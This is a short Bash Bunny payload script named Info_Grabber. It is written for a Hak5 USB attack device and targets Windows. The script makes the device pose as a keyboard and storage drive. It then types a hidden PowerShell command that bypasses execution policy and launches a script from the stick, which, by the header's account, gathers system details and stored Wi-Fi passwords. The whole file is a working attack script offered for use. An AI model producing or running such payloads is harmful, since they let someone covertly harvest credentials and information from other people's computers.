#!/bin/bash
#
# Title:            Info_Grabber
# Original Author:  Simen Kjeserud
# V2.0 Author:      DannyK999
# Version:          2.0
# Target:           Windows
# Creds:            Hak5Darren, Hak5 and Simen Kjeserud for inspiration
# 
# Executes run.ps1 which executes scripts that gets you information about
# the computer running and will also get wifi passwords


LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION

LED ATTACK
# Run the run.ps1 script in the BashBunny
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED FINISH
